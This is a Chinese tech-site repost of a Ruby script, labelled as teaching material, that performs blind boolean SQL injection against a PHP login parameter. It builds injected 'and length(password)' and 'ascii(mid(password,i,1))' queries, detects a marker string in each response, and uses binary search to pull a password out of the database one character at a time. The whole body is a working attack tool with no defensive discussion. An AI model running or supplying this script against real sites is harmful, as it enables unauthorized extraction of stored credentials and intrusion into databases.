MySQL暴力破解及注入攻击源代码

时间:2008-07-17 10:53:41   来源:  作者:  点击:次  出处:技术无忧
关键字:mysql 密码 破解 注入攻击

MySQL Brute Force Attack & [教学]Exploit 21: "SQL-Injection 2"
# Author      : Mysqlcracker
# Last Modify : 2007/12/11
require 'net/http'
require 'net/https'
host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
cookie = 'PHPSESSID=***********************'
http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
 'Cookie' => cookie,
#  'Referer' => 'http://profil.wp.pl/login.html',
#  'Content-Type' => 'application/x-www-form-urlencoded'
}
cmd = 'password';
appear_str = 'Steven Baker';
len = 0;
if(len > 0)
print 'len = ' + len.to_s;
else
len = 1;
print 'len = 1';
# Step 1. 判断回传长度
while(1)
 resp, data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'',
headers)
 break if(!data.index(appear_str));
 print 8.chr * len.to_s.length;
 len = len + 1;
 print len.to_s;
end
end

puts '';
i = 1;
print 'str = ';
# Step 2. 找出字符串
while(i <= len)  print 80.chr;  resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'',
headers);
if(data.index(appear_str))
 min = 80;
 max = 127;
else
 min = 32;
 max = 79;
end
while(min != max)
 mid = ((min + max + 1) / 2).to_i;
 print 8.chr;
 print mid.chr;
 str = '  [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']';
 print str;
 resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' +
mid.to_s + '--\'',  headers);
 if(data.index(appear_str))
   min = mid;
 else
  max = mid - 1;
end
 if(min > max)
  puts 'error: min > max';
  exit(0);
 end
 print (8.chr) * str.length + ' ' * str.length + (8.chr) * str.length;
end
print 8.chr + min.chr;
i = i + 1;
end
puts "\r\n\r\n" + 'sql brute force search done!!';

访问技术无忧网,软硬件通吃保你技术无忧!网址http://www.pc51.net


顶一下

文章评论

共有 0 位网友发表了评论 此处只显示部分留言 点击查看完整评论页面

特别推荐

最新信息